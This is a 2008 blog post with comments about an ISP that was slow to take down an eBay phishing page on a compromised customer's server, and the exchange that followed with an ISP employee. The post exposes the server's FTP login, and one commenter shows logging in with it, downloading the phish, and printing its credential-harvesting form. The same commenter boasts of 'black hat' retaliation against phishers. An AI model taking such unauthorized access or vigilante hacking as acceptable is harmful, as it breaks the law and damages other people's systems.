?

Log in

No account? Create an account

Previous Entry | Next Entry

Security is hard.

And it gets harder when ISPs are aware of security problems on their network but don't care. And believe it or not, I'm not talking about iPower this time.

Actual IM transcript from a conversation with xmission.com:

Tacit: You are hosting a phish.
Tacit: ftp://webmaster:webmaster@204.228.142.40/.ws/eBayISAPIi.dll
catalyst: chill, you could send a notification to abuse@xmission.com or to phish@ebay.com or whatever they have now
Tacit: Sent it two weeks ago.
Tacit: And a week ago.
Tacit: No response, phish still active.
Tacit: Two weeks is a long time.
Tacit: Your abuse@ address appears to be routed straight to /dev/null.
catalyst: I'm not an xmission employee, so I can't help, just thought I'd recommend some alternatives
rostrax: Abuse is a valid e-mail address and it is looked at.
rostrax: That would be my suggestion on what to do.
Tacit: Again?
Tacit: How many times do you think I should send the same email to abuse@xmission.com before I conclude that xmission supports and condones hacks and phishes on their network?
rostrax: How many times have you sent it?
Tacit: Four.
Tacit: First one two weeks ago.
rostrax: I cannot speak for our abuse team, but I'm sure they've looked into it
Tacit: If they'ved looked into it, and it's still active, what conclusion would you draw from that?
Tacit: 204.228.142.40 is on your network, yes?
rostrax: It is one of the IP's we have yes.
Tacit: And if you click on the above link, you would agree that it is definitely an eBay phish, yes?
rostrax: You have to understand business' have certain ways of handling these things. It may take some time. Please be patient with us, if you could send another e-mail I would appreciate it greatly. Also cc it to rostrax [at] xmission.com
Tacit: I do understand that businesses operate certain ways; I run one myself. Two weeks to handle a phish? Even China Netcom deals with phish sites faster...
rostrax: I'm unsure of our particular policy, but if you can send the e-mail and cc me on it, I will look into it on Tuesday

---
Edit: It gets better. Apparently, this phish has been active on Xmission's network since at least April 9th.


Comments

( 17 comments — Leave a comment )
(Deleted comment)
tacit
May. 25th, 2008 08:40 pm (UTC)
It blows my mind, really, how some ISPs refuse to take responsibility for their networks and do their jobs. I thought that Wide Open West responded to phish and hack complaints slowly, but Xmission...damn.
virtualmel
May. 25th, 2008 08:27 pm (UTC)
When I was on a fraud/abuse team, we had it down within hours at MOST.
Wow, that's just irresponsible.
tacit
May. 25th, 2008 08:37 pm (UTC)
And it gets even better. A Google search for 204.228.142.40 shows that this phish has been active since at least April 9, a month and sixteen days ago(!).

Wow. Just...wow. I do believe this sets a record for Most irresponsible ISP I Have Ever Seen.
beckycaret
May. 25th, 2008 08:41 pm (UTC)
i dunno what a phish is other than a band :X
tacit
May. 25th, 2008 08:47 pm (UTC)
Heh. A "phish" is an attempt to steal a person's bank account information, eBay information, or PayPal information by setting up a fake Web site that looks like he real thing, then sending out millions of spam emails saying things like "Your eBay account has been frozen" or "your online bank account access has been frozen" or something like that. The email then tells people to go to the fake Web site and type in their account information.

This particular phish is an eBay phish. If oyu go to the link, you see a page that looks exactly like the eBay home page. If you type in your username and password, you've just handed them over to the criminals, who then use them to access the victim's eBay account.
beckycaret
May. 25th, 2008 08:59 pm (UTC)
oohhhh! ya, when i get emails like that i just go directly to ebay or paypal without touching the link in the emails. i got some Noscript plug in for firefox, too, just in case a fake website has some weird scripts to force into my box to steal my passwords to LJ! haha
zastrazzi
May. 25th, 2008 10:06 pm (UTC)
In defence of the poor bastard who was talking to you, and their abuse team - the fault lies entirely with xmission as a corporation. It's pretty likely they aren't at all properly supporting their team and providing the necessary resources to act on abuse complaints in a timely manner.

So the short answer is, report to abuse as usual and find the contact info for someone in management and cc them on all of them.

Post the information and tactic with peers who also do reporting. It can only change from outside, because I can guarantee that they aren't listening to any bitching by their abuse team.
cjhm
May. 25th, 2008 10:40 pm (UTC)
We have a friend (who's on LJ actually but I won't name him) who was dating a girl in Seattle and thought he'd show her company some of the holes, and then proved it, and then your wonderful country put him in jail for proving it (albeit only for a weekend while he got bail and lawyer together).
That's the short story but in the end, I would agree with you - the ISPs often don't care - unless you rub their noses in it.
tothwolf
May. 25th, 2008 11:01 pm (UTC)
It might be time to get in contact with their netblock provider, which in this case is WestNet. Look up NET-204-228-0-0-1 for the contact details. Generally I've found calling the NOC of the company or their upstream provider to be highly effective in getting this sort of crap shut down.

There have been a number of times I've had to put on my black hat in order to shut down a number of eBay phishing attempts. Some were pretty simple and some were fairly elaborate. I still can't help but wonder what some of those kiddies thought when all their files were overwritten/removed and their passwords were changed :P

I still get at least 2-5 eBay phishing emails a day though...
tothwolf
May. 25th, 2008 11:09 pm (UTC)
$ ncftp -u webmaster 204.228.142.40

Connecting to 204.228.142.40...
FTP Server Ready.
Logging in...
Password requested by 204.228.142.40 for user "webmaster".

Password required for webmaster.

Password: *********

Welcome webmaster.
Logged in to 204.228.142.40.
ncftp / > site help
The following SITE commands are recognized (* =>'s unimplemented).
HELP
CHGRP
CHMOD
Direct comments to root@ws1.hotgoth.net.


$ host hotgoth.net
hotgoth.net has address 204.228.142.43
hotgoth.net mail is handled by 5 mail.hotgoth.net.
hotgoth.net mail is handled by 6 smtp.easydns.com.
hotgoth.net mail is handled by 7 smtp2.easydns.com.
tothwolf
May. 25th, 2008 11:21 pm (UTC)
$ wget ftp://webmaster:webmaster@204.228.142.40/.ws/eBayISAPIi.dll

$ grep -i mailto eBayISAPIi.dll

<FORM name=frmcadastro action=http://www.paus.ch/cgi-bin/mailto/mailto.exe method=post><INPUT type=hidden value=traglamui@gmail.com name=sendto><FONT size=2> </FONT><INPUT type=hidden value=mail.paus.ch name=server><FONT size=2> </FONT><INPUT type=hidden value=http://pages.ebay.com/question name=resulturl><FONT size=2> <FONT face=arial></FONT></FONT>

This one is a fairly unsophisticated operation all things considered.

Maybe time to go email the folks at Google? That should shut him down pretty quick.
pulsecub
May. 27th, 2008 07:06 am (UTC)
I have some very good friends who work at Xmission. I'm going to forward them the link to this entry. Knowing them, they will see something is done about the phish and perhaps even the sloth who spoke with you.
redbeardedblond
May. 27th, 2008 04:35 pm (UTC)
looking in to it...
I'm one of pulsecub's friends that works there.

I have looked at the IP in question and it is one of our customers' IP's that has apparently been pwned.

For what it's worth, I have looked back at our ticketing system and searched on both your email address and the IP address in question in all tickets (including the resolved ones) and only see the two you sent 33 hours ago and 43 hours ago. I do not see anything regarding this from a week ago nor two weeks ago (and all of them are logged).

I also see that the customer of ours in question that has that IP address is one that I, personally set up. Without trying to slander the customer, I will say that I have met many people much more security conscious in my life than they. If you want to hear about my personal opinion of this customer and their network administrative abilities, please reserve an hour for the rant.

They are connected to us (we are their ISP) as an end user and therefore, not part of our internal network. When we find that a customer is compromised like this we contact them and tell them to fix it within 24 hours or we'll block them.

Because this is not on our internal network, we are not able to take responsibility for this customers' machine security.

I have alerted our VP of operations to this, btw. I'll refer him to tickets numbered 249731 and 249733

Edited at 2008-05-27 05:59 pm (UTC)
tacit
May. 27th, 2008 07:10 pm (UTC)
Re: looking in to it...
I first sent notification of this phish to abuse@xmission.com on 5/15/08 at 4:50:38 PM EDT from my AOL email address with the sublect line:

You are hosting a phish: 204.228.142.40

I still have the original message (I keep all my sent email), and can send it to you again if you wish. If you have not found any record of that email, then I suspect there may be a problem in either your ticketing system or in your abuse address.

While you can not take responsibility for someone else's security, you do have many options if you know you are hosting a compromised system, up to and including terminating that user's account. The phish at 204.228.142.40 was first reported on April 9, 2008, and continued to be active on your network for, at minimum, one month and twelve days. That's a very long time to be hosting an active phish.
redbeardedblond
May. 27th, 2008 07:16 pm (UTC)
Re: looking in to it...
Our policy is to give them a chance to fix it first.

Since this is, from our point of view, the first time we've seen this, we have to contact them.

Do you have the ticket number? I'll alert our operations VP to the problem if you can give me that number as I'm unable to find it by searching on 204.228.142.40 or on the name "tacit."
tacit
May. 27th, 2008 07:28 pm (UTC)
Re: looking in to it...
I never received a reply from the first email; it should have come from the email address tacitr (at) aol (dot) com. Nor did I receive a reply from the followup email, but I did receive a reply with ticket number 249732 from your online CGI contact form on May 25.
redbeardedblond
May. 27th, 2008 08:11 pm (UTC)
Re: looking in to it...
We have attempted to contact this customer by various means all day with no success. We will be shutting off his port by 5:00 pm mountain daylight time if we are unable to contact him.

The "reported on april 9th" link seems to be part of a discussion group that we don't troll. While it's easy to search on these things after knowing details, there is no reason to expect that an ISP will be catching these compromised users' machines without it being reported to them.

We do run active tests for open mail relays and many other system vulnerabilities across our entire network but something like a phishing site, as I'm sure you are aware, does not broadcast itself as a problem unless it spams through our network (which this one does not do).

Thank you for submitting the ticket again when your first emails did not get through to us. We have not gotten any complaints about AOL mail not getting through to our customers in the past few months so I cannot say why your earlier notifications were not received.

Since this has been taken care of with all due speed on our end as soon as we were notified of its existence, I will consider the matter closed.
( 17 comments — Leave a comment )